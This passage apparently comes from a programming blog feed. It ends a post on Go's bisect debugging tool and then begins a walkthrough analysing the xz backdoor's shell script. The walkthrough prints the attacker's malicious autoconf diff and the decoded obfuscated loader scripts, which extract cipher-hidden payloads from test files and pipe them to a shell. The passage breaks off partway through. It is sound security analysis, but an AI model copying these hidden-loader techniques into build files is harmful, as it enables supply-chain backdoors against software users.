height=218 src="hashbisect0.png" srcset="hashbisect0.png 1x, hashbisect0@1.5x.png 1.5x, hashbisect0@2x.png 2x, hashbisect0@3x.png 3x, hashbisect0@4x.png 4x"> <p> FMA is not something most programmers encounter. If they do get an FMA-induced test failure, having a tool that automatically identifies the exact culprit line is invaluable. <a class=anchor href="#use_case"><h2 id="use_case">Use Case: Language Changes</h2></a> <p> The next problem that presented itself was a language change. Go, like C# and JavaScript, learned the hard way that loop-scoped loop variables don’t mix well with closures and concurrency. Like those languages, Go recently changed to <a href="https://go.dev/blog/loopvar-preview">iteration-scoped loop variables</a>, correcting many buggy programs in the process.
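<p> To make the semantic change concrete, here is a small, self-contained illustration (my own sketch, not code from any of the failing tests) of the kind of loop the change affects. Under the old loop-scoped rules every closure shares one <code>v</code>; under the new iteration-scoped rules each closure gets its own copy: <pre>package main

import (
	"fmt"
	"sync"
)

func main() {
	var wg sync.WaitGroup
	out := make(chan int, 3)
	for _, v := range []int{1, 2, 3} {
		wg.Add(1)
		go func() {
			defer wg.Done()
			out &lt;- v // which v does each goroutine see?
		}()
	}
	wg.Wait()
	close(out)
	for v := range out {
		fmt.Println(v)
	}
	// Old semantics (Go 1.21 and earlier): the goroutines share one v,
	// so the output is typically 3, 3, 3 (and the unsynchronized reads
	// of v are a data race).
	// New semantics (Go 1.22 and later): each iteration has its own v,
	// so the output is 1, 2, 3 in some order.
}
</pre>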
<p> Unfortunately, sometimes tests unintentionally check for buggy behavior. Deploying the loop change in a large code base, we confronted truly mysterious failures in complex, unfamiliar code. Conditioning the loop change on a suffix of a hash of the source file name and line number enabled bisect-reduce to pinpoint the specific loop or loops that triggered the test failures. We even found a few cases where changing any one loop did not cause a failure, but changing a specific pair of loops did. The generality of finding multiple culprits is necessary in practice. <p> The loop change would have been far more difficult without automated diagnosis. <a class=anchor href="#use_case"><h2 id="use_case">Use Case: Library Changes</h2></a> <p> Bisect-reduce also applies to library changes: we can hash the caller, or more precisely the call stack, and then choose between the old and new implementation based on a hash suffix. <p> For example, suppose you add a new sort implementation and a large program fails. Assuming the sort is correct, the problem is almost certainly that the new sort and the old sort disagree about the final order of some values that compare equal. Or maybe the sort is buggy. Either way, the large program probably calls sort in many different places. Running bisect-reduce over hashes of the call stacks will identify the exact call stack where using the new sort causes a failure. This is what was happening in the example at the start of the post, with a new timer implementation instead of a new sort. <p> Call stacks are a use case that only works with hashing, not with sequential numbering. For the examples up to this point, a setup pass could number all the functions in a program or number all the source lines presented to the compiler, and then bisect-reduce could apply to binary suffixes of the sequence number. But there is no dense sequential numbering of all the possible call stacks a program will encounter. On the other hand, hashing a list of program counters is trivial. <p> We realized that bisect-reduce would apply to library changes around the time we were introducing the <a href="https://go.dev/doc/godebug">GODEBUG mechanism</a>, which provides a framework for tracking and toggling these kinds of compatible-but-breaking changes. We arranged for that framework to provide <code>bisect</code> support for all GODEBUG settings automatically. <p> For Go 1.23, we rewrote the <a href="https://go.dev/pkg/time/#Timer">time.Timer</a> implementation and changed its semantics slightly, to remove some races in existing APIs and also enable earlier garbage collection in some common cases. One effect of the new implementation is that very short timers trigger more reliably. Before, a 0ns or 1ns timer (which are often used in tests) could take many microseconds to trigger. Now, they trigger on time. But of course, buggy code (mostly in tests) exists that fails when the timers start triggering as early as they should. We debugged a dozen or so of these inside Google’s source tree—all of them complex and unfamiliar—and <code>bisect</code> made the process painless and maybe even fun. <p> For one failing test case, I made a mistake. The test looked simple enough to eyeball, so I spent half an hour puzzling through how the only timer in the code under test, a hard-coded one minute timer, could possibly be affected by the new implementation. Eventually I gave up and ran <code>bisect</code>. 
The stack trace showed immediately that there was a testing middleware layer that was rewriting the one-minute timeout into a 1ns timeout to speed up the test. Tools see what people cannot. <a class=anchor href="#interesting_lessons_learned"><h2 id="interesting_lessons_learned">Interesting Lessons Learned</h2></a> <p> One interesting thing we learned while working on <code>bisect</code> is that it is important to try to detect flaky tests. Early in debugging loop change failures, <code>bisect</code> pointed at a completely correct, trivial loop in a cryptography package. At first, we were very scared: if <i>that</i> loop was changing behavior, something would have to be very wrong in the compiler. We realized the problem was flaky tests. A test that fails randomly causes <code>bisect</code> to make a random walk over the source code, eventually pointing a finger at entirely innocent code. After that, we added a <code>-count=N</code> flag to <code>bisect</code> that causes it to run every trial <i>N</i> times and bail out entirely if they disagree. We set the default to <code>-count=2</code> so that <code>bisect</code> always does basic flakiness checking. <p> Flaky tests remain an area that needs more work. If the problem being debugged is that a test went from passing reliably to failing half the time, running <code>go test -count=5</code> increases the chance of failure by running the test five times. Equivalently, it can help to use a tiny shell script like <pre>% cat bin/allpass #!/bin/sh n=$1 shift for i in $(seq $n); do "$@" || exit 1 done </pre> <p> Then <code>bisect</code> can be invoked as: <pre>% bisect -godebug asynctimerchan=1 allpass 5 ./flakytest </pre> <p> Now bisect only sees <code>./flakytest</code> passing five times in a row as a successful run. <p> Similarly, if a test goes from passing unreliably to failing all the time, an <code>anypass</code> variant works instead: <pre>% cat bin/anypass #!/bin/sh n=$1 shift for i in $(seq $n); do "$@" &amp;&amp; exit 0 done exit 1 </pre> <p> The <a href="https://man7.org/linux/man-pages/man1/timeout.1.html"><code>timeout</code> command</a> is also useful if the change has made a test run forever instead of failing. <p> The tool-based approach to handling flakiness works decently but does not seem like a complete solution. A more principled approach inside <code>bisect</code> would be better. We are still working out what that would be. <p> Another interesting thing we learned is that when bisecting over run-time changes, hash decisions are made so frequently that it is too expensive to print the full stack trace of every decision made at every stage of the bisect-reduce. (The first run uses an empty suffix that matches every hash!) Instead, bisect hash patterns default to a “quiet” mode where each decision prints only the hash bits, since that’s all <code>bisect</code> needs to guide the search and narrow down the relevant stacks. Once <code>bisect</code> has identified a minimal set of relevant stacks, it runs the test once more with the hash pattern in “verbose” mode. That causes the bisect library to print both the hash bits and the corresponding stack traces, and <code>bisect</code> displays those stack traces in its report.
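<p> For readers who want to picture what such a run-time decision point looks like, here is a deliberately simplified sketch. It is not the real bisect library (that lives in <code>golang.org/x/tools/internal/bisect</code> and has its own hash and report formats); it only illustrates the idea described above: hash the current call stack, enable the change only when the hash’s low bits match the suffix pattern under test, and in quiet mode report nothing more than the hash bits: <pre>// Package sketch illustrates, in simplified form, the per-stack decision
// described in the text. The pattern variable, the FNV hash, and the
// report format are all stand-ins, not the real bisect protocol.
package sketch

import (
	"fmt"
	"hash/fnv"
	"runtime"
	"strconv"
	"strings"
)

// pattern is the binary hash suffix supplied by the bisect driver,
// for example "0110". The empty pattern matches every hash.
var pattern = ""

// enableNewCode reports whether the new code path should be used for
// the current call stack. In quiet mode it prints only the hash bits,
// which is all the driver needs to count and refine matching stacks.
func enableNewCode() bool {
	var pcs [16]uintptr
	n := runtime.Callers(2, pcs[:]) // start at our caller
	h := fnv.New64a()
	for _, pc := range pcs[:n] {
		fmt.Fprintf(h, "%x,", pc)
	}
	bits := strconv.FormatUint(h.Sum64(), 2)
	if !strings.HasSuffix(bits, pattern) {
		return false // this stack keeps the old behavior
	}
	fmt.Println("match", bits) // quiet report: hash bits only
	return true
}
</pre> <p> A verbose mode would print the stack trace alongside the hash bits, which is what the real library does once <code>bisect</code> has settled on the final pattern and needs human-readable stacks for its report.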
<a class=anchor href="#try_bisect"><h2 id="try_bisect">Try Bisect</h2></a> <p> The <a href="https://pkg.go.dev/golang.org/x/tools/cmd/bisect"><code>bisect</code> tool</a> can be downloaded and used today: <pre>% go install golang.org/x/tools/cmd/bisect@latest </pre> <p> If you are debugging a <a href="https://go.dev/wiki/LoopvarExperiment">loop variable problem</a> in Go 1.22, you can use a command like <pre>% bisect -compile=loopvar go test </pre> <p> If you are debugging a <a href="https://go.dev/change/966609ad9e82ba173bcc8f57f4bfc35a86a62c8a">timer problem in Go 1.23</a>, you can use: <pre>% bisect -godebug asynctimerchan=1 go test </pre> <p> The <code>-compile</code> and <code>-godebug</code> flags are conveniences. The general form of the command is <pre>% bisect [KEY=value...] cmd [args...] </pre> <p> where the leading <code>KEY=value</code> arguments set environment variables before invoking the command with the remaining arguments. <code>Bisect</code> expects to find the literal string <code>PATTERN</code> somewhere on its command line, and it replaces that string with a hash pattern each time it repeats the command. <p> You can use <code>bisect</code> to debug problems in your own compilers or libraries by having them accept a hash pattern either in the environment or on the command line and then print specially formatted lines for <code>bisect</code> on standard output or standard error. The easiest way to do this is to use <a href="https://pkg.go.dev/golang.org/x/tools/internal/bisect">the bisect package</a>. That package is not available for direct import yet (there is a <a href="https://go.dev/issue/67140">pending proposal</a> to add it to the Go standard library), but the package is only a <a href="https://cs.opensource.google/go/x/tools/+/master:internal/bisect/bisect.go">single file with no imports</a>, so it is easily copied into new projects or even translated to other languages. The package documentation also documents the hash pattern syntax and required output format. <p> If you work on compilers or libraries and ever need to debug why a seemingly correct change you made broke a complex program, give <code>bisect</code> a try. It never stops feeling like magic. The xz attack shell script tag:research.swtch.com,2012:research.swtch.com/xz-script 2024-04-02T04:00:00-04:00 2024-04-03T11:02:00-04:00 A detailed walkthrough of the xz attack shell script. <a class=anchor href="#introduction"><h2 id="introduction">Introduction</h2></a> <p> Andres Freund <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">published the existence of the xz attack</a> on 2024-03-29 to the public oss-security@openwall mailing list. The day before, he alerted Debian security and the (private) distros@openwall list. In his mail, he says that he dug into this after “observing a few odd symptoms around liblzma (part of the xz package) on Debian sid installations over the last weeks (logins with ssh taking a lot of CPU, valgrind errors).” <p> At a high level, the attack is split in two pieces: a shell script and an object file. There is an injection of shell code during <code>configure</code>, which injects the shell code into <code>make</code>. The shell code during <code>make</code> adds the object file to the build. This post examines the shell script. (See also <a href="xz-timeline">my timeline post</a>.) 
<p> The nefarious object file would have looked suspicious checked into the repository as <code>evil.o</code>, so instead both the nefarious shell code and object file are embedded, compressed and encrypted, in some binary files that were added as “test inputs” for some new tests. The test file directory already existed from long before Jia Tan arrived, and the README explained “This directory contains bunch of files to test handling of .xz, .lzma (LZMA_Alone), and .lz (lzip) files in decoder implementations. Many of the files have been created by hand with a hex editor, thus there is no better “source code” than the files themselves.” This is a fact of life for parsing libraries like liblzma. The attacker looked like they were just <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0">adding a few new test files</a>. <p> Unfortunately the nefarious object file turned out to have a bug that caused problems with Valgrind, so the test files needed to be updated to add the fix. <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=74b138d2a6529f2c07729d7c77b1725a8e8b16f1">That commit</a> explained “The original files were generated with random local to my machine. To better reproduce these files in the future, a constant seed was used to recreate these files.” The attackers realized at this point that they needed a better update mechanism, so the new nefarious script contains an extension mechanism that lets it look for updated scripts in new test files, which wouldn’t draw as much attention as rewriting existing ones. <p> The effect of the scripts is to arrange for the nefarious object file’s <code>_get_cpuid</code> function to be called as part of a <a href="https://sourceware.org/glibc/wiki/GNU_IFUNC">GNU indirect function</a> (ifunc) resolver. In general these resolvers can be called lazily at any time during program execution, but for security reasons it has become popular to call all of them during dynamic linking (very early in program startup) and then map the <a href="https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html">global offset table (GOT) and procedure linkage table (PLT) read-only</a>, to keep buffer overflows and the like from being able to edit it. But a nefarious ifunc resolver would run early enough to be able to edit those tables, and that’s exactly what the backdoor introduced. The resolver then looked through the tables for <code>RSA_public_decrypt</code> and replaced it with a nefarious version that <a href="https://github.com/amlweems/xzbot">runs attacker code when the right SSH certificate is presented</a>. <a class=anchor href="#configure"><h2 id="configure">Configure</h2></a> <p> Again, this post looks at the script side of the attack. Like most complex Unix software, xz-utils uses GNU autoconf to decide how to build itself on a particular system. In ordinary operation, autoconf reads a <code>configure.ac</code> file and produces a <code>configure</code> script, perhaps with supporting m4 files brought in to provide “libraries” to the script. Usually, the <code>configure</code> script and its support libraries are only added to the tarball distributions, not the source repository. The xz distribution works this way too. <p> The attack kicks off with the attacker adding an unexpected support library, <code>m4/build-to-host.m4</code> to the xz-5.6.0 and xz-5.6.1 tarball distributions. 
Compared to the standard <code>build-to-host.m4</code>, the attacker has made the following changes: <pre>diff --git a/build-to-host.m4 b/build-to-host.m4 index ad22a0a..d5ec315 100644 --- a/build-to-host.m4 +++ b/build-to-host.m4 @@ -1,5 +1,5 @@ -# build-to-host.m4 serial 3 -dnl Copyright (C) 2023 Free Software Foundation, Inc. +# build-to-host.m4 serial 30 +dnl Copyright (C) 2023-2024 Free Software Foundation, Inc. dnl This file is free software; the Free Software Foundation dnl gives unlimited permission to copy and/or distribute it, dnl with or without modifications, as long as this notice is preserved. @@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST], dnl Define somedir_c. gl_final_[$1]="$[$1]" + gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"` dnl Translate it from build syntax to host syntax. case "$build_os" in cygwin*) @@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST], if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then [$1]_c_make='\"$([$1])\"' fi + if test "x$gl_am_configmake" != "x"; then + gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2&gt;/dev/null' + else + gl_[$1]_config='' + fi + _LT_TAGDECL([], [gl_path_map], [2])dnl + _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl + _LT_TAGDECL([], [gl_am_configmake], [2])dnl + _LT_TAGDECL([], [[$1]_c_make], [2])dnl + _LT_TAGDECL([], [gl_[$1]_config], [2])dnl AC_SUBST([$1_c_make]) + + dnl If the host conversion code has been placed in $gl_config_gt, + dnl instead of duplicating it all over again into config.status, + dnl then we will have config.status run $gl_config_gt later, so it + dnl needs to know what name is stored there: + AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2&gt;/dev/null], [gl_config_gt="eval \$gl_[$1]_config"]) ]) dnl Some initializations for gl_BUILD_TO_HOST. AC_DEFUN([gl_BUILD_TO_HOST_INIT], [ + dnl Search for Automake-defined pkg* macros, in the order + dnl listed in the Automake 1.10a+ documentation. + gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2&gt;/dev/null` + if test -n "$gl_am_configmake"; then + HAVE_PKG_CONFIGMAKE=1 + else + HAVE_PKG_CONFIGMAKE=0 + fi + gl_sed_double_backslashes='s/\\/\\\\/g' gl_sed_escape_doublequotes='s/"/\\"/g' + gl_path_map='tr "\t \-_" " \t_\-"' changequote(,)dnl gl_sed_escape_for_make_1="s,\\([ \"&amp;'();&lt;&gt;\\\\\`|]\\),\\\\\\1,g" changequote([,])dnl </pre> <p> All in all, this is a fairly plausible set of diffs, in case anyone thought to check. It bumps the version number, updates the copyright year to look current, and makes a handful of inscrutable changes that don’t look terribly out of place. <p> Looking closer, something is amiss. Starting near the bottom, <pre>gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2&gt;/dev/null` if test -n "$gl_am_configmake"; then HAVE_PKG_CONFIGMAKE=1 else HAVE_PKG_CONFIGMAKE=0 fi </pre> <p> Let’s see which files in the distribution match the pattern (simplifying the <code>grep</code> command): <pre>% egrep -Rn '####[[:alnum:]][[:alnum:]][[:alnum:]][[:alnum:]][[:alnum:]]####$' Binary file ./tests/files/bad-3-corrupt_lzma2.xz matches % </pre> <p> That’s surprising! So this script sets <code>gl_am_configmake=./tests/files/bad-3-corrupt_lzma2.xz</code> and <code>HAVE_PKG_CONFIGMAKE=1</code>. The <code>gl_path_map</code> setting is a <a href="https://linux.die.net/man/1/tr">tr(1)</a> command that swaps tabs and spaces and swaps underscores and dashes. 
<p> Now reading the top of the script, <pre>gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"` </pre> <p> extracts the final dot-separated element of that filename, leaving <code>xz</code>. That is, it’s the file name suffix, not a prefix, and it is the name of the compression command that is likely already installed on any build machine. <p> The next section is: <pre>if test "x$gl_am_configmake" != "x"; then gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2&gt;/dev/null' else gl_[$1]_config='' fi </pre> <p> We know that <code>gl_am_configmake=./tests/files/bad-3-corrupt_lzma2.xz</code>, so this sets the <code>gl_[$1]_config</code> variable to the string <pre>sed "r\n" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2&gt;/dev/null </pre> <p> At first glance, especially in the original quoted form, the <code>sed</code> command looks like it has something to do with line endings, but in fact <code>r\n</code> is the <code>sed</code> “read from file <code>\n</code>” command. Since the file <code>\n</code> does not exist, the command does nothing at all, and then since <code>sed</code> has not been invoked with the <code>-n</code> option, <code>sed</code> prints each line of input. So <code>sed "r\n"</code> is just an obfuscated <code>cat</code> command, and remember that <code>$gl_path_map</code> is the <code>tr</code> command from before, and <code>$gl_[$1]_prefix</code> is <code>xz</code>. To the shell, this command is really <pre>cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d </pre> <p> But right now it’s still just a string; it hasn’t been run. That changes with <pre>dnl If the host conversion code has been placed in $gl_config_gt, dnl instead of duplicating it all over again into config.status, dnl then we will have config.status run $gl_config_gt later, so it dnl needs to know what name is stored there: AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2&gt;/dev/null], [gl_config_gt="eval \$gl_[$1]_config"]) </pre> <p> The final <code>"eval \$gl_[$1]_config"</code> runs that command. 
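<p> If you want to convince yourself that the <code>sed</code> stage really is a pass-through, here is a minimal sketch (any input will do, as long as no file named <code>\n</code> exists in the current directory):
<pre>$ printf 'first line\nsecond line\n' | sed "r\n"
first line
second line
$
</pre>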
If we run it on the xz 5.6.0 repo, we get: <pre>$ cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d ####Hello#### #��Z�.hj� eval `grep ^srcdir= config.status` if test -f ../../config.status;then eval `grep ^srcdir= ../../config.status` srcdir="../../$srcdir" fi export i="((head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +724)"; (xz -dc $srcdir/tests/files/good-large_compressed.lzma| eval $i|tail -c +31265| tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")| xz -F raw --lzma1 -dc|/bin/sh ####World#### $ </pre> <p> I have inserted some line breaks, here and in later script fragments, to keep the lines from being too long in the web page. <p> Why the Hello and World? The README text that came with the test file describes it:<blockquote> <p> bad-3-corrupt_lzma2.xz has three Streams in it. The first and third streams are valid xz Streams. The middle Stream has a correct Stream Header, Block Header, Index and Stream Footer. Only the LZMA2 data is corrupt. This file should decompress if <code>--single-stream</code> is used.</blockquote> <p> The first and third streams are the Hello and World, and the middle stream has been corrupted by swapping the byte values unswapped by the <code>tr</code> command. <p> Recalling that xz 5.6.1 shipped with different “test” files, we can also try xz 5.6.1: <pre>$ cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d ####Hello#### #�U��$� [ ! $(uname) = "Linux" ] &amp;&amp; exit 0 [ ! $(uname) = "Linux" ] &amp;&amp; exit 0 [ ! $(uname) = "Linux" ] &amp;&amp; exit 0 [ ! $(uname) = "Linux" ] &amp;&amp; exit 0 [ ! 
$(uname) = "Linux" ] &amp;&amp; exit 0 eval `grep ^srcdir= config.status` if test -f ../../config.status;then eval `grep ^srcdir= ../../config.status` srcdir="../../$srcdir" fi export i="((head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +939)"; (xz -dc $srcdir/tests/files/good-large_compressed.lzma| eval $i|tail -c +31233| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")| xz -F raw --lzma1 -dc|/bin/sh ####World#### $ </pre> <p> The first difference is that the script makes sure (very sure!) to exit if not being run on Linux. The second difference is that the long “<code>export i</code>” line deviates in the final head command offset (724 vs 939) and then the tail offset and the <code>tr</code> argument. Let’s break those down. <p> The <code>head</code> command prints a prefix of its input. Let’s look at the start: <pre>(head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; ... </pre> <p> This discards the first kilobyte of standard input, prints the next two kilobytes, discards the next kilobyte, and prints the next two kilobytes. And so on. The whole command for 5.6.1 is: <pre>(head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; ... 16 times total ... head -c +939 </pre> <p> The shell variable <code>i</code> is set to this long command. Then the script runs: <pre>xz -dc $srcdir/tests/files/good-large_compressed.lzma | eval $i | tail -c +31233 | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" | xz -F raw --lzma1 -dc | /bin/sh </pre> <p> The first <code>xz</code> command uncompresses another malicious test file. The <code>eval</code> then runs the <code>head</code> pipeline, extracting a total of 16×2048+939 = 33,707 bytes. Then the <code>tail</code> command discards everything before byte offset 31,233, keeping only the final 2,475 bytes. The <code>tr</code> command applies a simple substitution cipher to the output (so that just in case anyone thought to pull these specific byte ranges out of the file, they wouldn’t recognize it as a valid lzma input!?). The second <code>xz</code> command decodes the translated bytes as a raw lzma stream, and then of course the result is piped through the shell. <p> Skipping the shell pipe, we can run this, obtaining a very long shell script. I have added commentary in between sections of the output.
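<p> Before wading into that output, two tiny sketches (with made-up data and chunk sizes, not the attack’s) may help make the two tricks in that pipeline concrete: the alternating <code>head</code> extraction and the use of <code>tr</code> with character ranges as a substitution cipher.
<pre>$ # alternating skip/keep extraction, shrunk down to 4-byte chunks
$ i="((head -c +4 &gt;/dev/null) &amp;&amp; head -c +4 &amp;&amp; (head -c +4 &gt;/dev/null) &amp;&amp; head -c +4)"
$ printf 'AAAABBBBCCCCDDD\n' | eval $i
BBBBDDD
$ # tr with ranges as a substitution cipher (here, ROT13 on A-Z);
$ # swapping the two range arguments decodes it
$ echo 'ATTACKATDAWN' | tr 'A-MN-Z' 'N-ZA-M'
NGGNPXNGQNJA
$ echo 'NGGNPXNGQNJA' | tr 'N-ZA-M' 'A-MN-Z'
ATTACKATDAWN
$
</pre>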
<pre>$ xz -dc $srcdir/tests/files/good-large_compressed.lzma | eval $i | tail -c +31233 | tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" | xz -F raw --lzma1 -dc P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections" C="pic_flag=\" $P\"" O="^pic_flag=\" -fPIC -DPIC\"$" R="is_arch_extension_supported" x="__get_cpuid(" p="good-large_compressed.lzma" U="bad-3-corrupt_lzma2.xz" </pre> <p> So far, setting up environment variables. <pre>[ ! $(uname)="Linux" ] &amp;&amp; exit 0 # 5.6.1 only </pre> <p> A line that only appears in 5.6.1, exiting when not run on Linux. In general the scripts in 5.6.0 and 5.6.1 are very similar: 5.6.1 has a few additions. We will examine the 5.6.1 script, with the additions marked. This line is an attempted robustness fix with a bug (pointed out by Jakub Wilk): there are no spaces around the <code>=</code>, making the line a no-op. <pre>eval $zrKcVq </pre> <p> The first of many odd eval statements, for variables that do not appear to be set anywhere. One possibility is that these are debug prints: when the attacker is debugging the script, setting, say, <code>zrKcVq=env</code> inserts a debug print during execution. Another possibility is that these are extension points that can be set by some other mechanism, run before this code, in the future. <pre>if test -f config.status; then eval $zrKcSS eval `grep ^LD=\'\/ config.status` eval `grep ^CC=\' config.status` eval `grep ^GCC=\' config.status` eval `grep ^srcdir=\' config.status` eval `grep ^build=\'x86_64 config.status` eval `grep ^enable_shared=\'yes\' config.status` eval `grep ^enable_static=\' config.status` eval `grep ^gl_path_map=\' config.status` </pre> <p> If <code>config.status</code> exists, we read various variables from it into the shell, along with two extension points. Note that we are still inside the config.status check (let’s call it “if #1”) as we continue through the output. <pre># Entirely new in 5.6.1 vs=`grep -broaF '~!:_ W' $srcdir/tests/files/ 2&gt;/dev/null` if test "x$vs" != "x" &gt; /dev/null 2&gt;&amp;1;then f1=`echo $vs | cut -d: -f1` if test "x$f1" != "x" &gt; /dev/null 2&gt;&amp;1;then start=`expr $(echo $vs | cut -d: -f2) + 7` ve=`grep -broaF '|_!{ -' $srcdir/tests/files/ 2&gt;/dev/null` if test "x$ve" != "x" &gt; /dev/null 2&gt;&amp;1;then f2=`echo $ve | cut -d: -f1` if test "x$f2" != "x" &gt; /dev/null 2&gt;&amp;1;then [ ! "x$f2" = "x$f1" ] &amp;&amp; exit 0 [ ! -f $f1 ] &amp;&amp; exit 0 end=`expr $(echo $ve | cut -d: -f2) - $start` eval `cat $f1 | tail -c +${start} | head -c +${end} | tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" | xz -F raw --lzma2 -dc` fi fi fi fi </pre> <p> This section is entirely new in 5.6.1. It looks for a single test file to contain the magic texts <code>'~!:_ W'</code> and <code>'|_!{ -'</code>, extracts the bytes between them, applies a substitution cipher, decompresses the result, and evaluates the output as a shell script. This appears to be an extension mechanism, so that the next time changes are needed in this script, a new script can be added in a different test file, instead of having to <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=74b138d2a6529f2c07729d7c77b1725a8e8b16f1">make up reasons to regenerate existing binary test files</a>. <p> The next chunk continues with script that was present in 5.6.0. <pre>eval $zrKccj if ! grep -qs '\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"' config.status &gt; /dev/null 2&gt;&amp;1;then exit 0 fi if ! 
grep -qs 'define HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> Two different checks that <a href="https://maskray.me/blog/2021-01-18-gnu-indirect-function">GNU indirect function</a> support is enabled. If not, stop the script. The backdoor requires this functionality. <pre>if test "x$enable_shared" != "xyes";then exit 0 fi </pre> <p> Require shared library support. <pre>if ! (echo "$build" | grep -Eq "^x86_64" &gt; /dev/null 2&gt;&amp;1) &amp;&amp; (echo "$build" | grep -Eq "linux-gnu$" &gt; /dev/null 2&gt;&amp;1);then exit 0 fi </pre> <p> Require an x86-64 Linux system. <pre>if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc64_fast.c &gt; /dev/null 2&gt;&amp;1; then exit 0 fi if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc32_fast.c &gt; /dev/null 2&gt;&amp;1; then exit 0 fi if ! grep -qs "$R" $srcdir/src/liblzma/check/crc_x86_clmul.h &gt; /dev/null 2&gt;&amp;1; then exit 0 fi if ! grep -qs "$x" $srcdir/src/liblzma/check/crc_x86_clmul.h &gt; /dev/null 2&gt;&amp;1; then exit 0 fi </pre> <p> Require all the crc ifunc code (in case it has been patched out?). <pre>if test "x$GCC" != 'xyes' &gt; /dev/null 2&gt;&amp;1;then exit 0 fi if test "x$CC" != 'xgcc' &gt; /dev/null 2&gt;&amp;1;then exit 0 fi LDv=$LD" -v" if ! $LDv 2&gt;&amp;1 | grep -qs 'GNU ld' &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> Require gcc (not clang, I suppose) and GNU ld. <pre>if ! test -f "$srcdir/tests/files/$p" &gt; /dev/null 2&gt;&amp;1;then exit 0 fi if ! test -f 